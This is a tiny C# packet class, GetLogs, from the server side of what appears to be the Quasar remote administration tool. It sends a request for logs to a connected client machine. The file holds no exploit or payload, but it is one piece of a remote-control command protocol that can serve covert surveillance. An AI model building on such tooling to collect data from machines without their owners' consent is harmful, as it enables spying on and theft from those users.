Quasar/Server/Core/Packets/ServerPackets/GetLogs.cs

16 lines
290 B
C#

using ProtoBuf;
using xServer.Core.Networking;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class GetLogs : IPacket
{
public GetLogs() { }
public void Execute(Client client)
{
client.Send(this);
}
}
}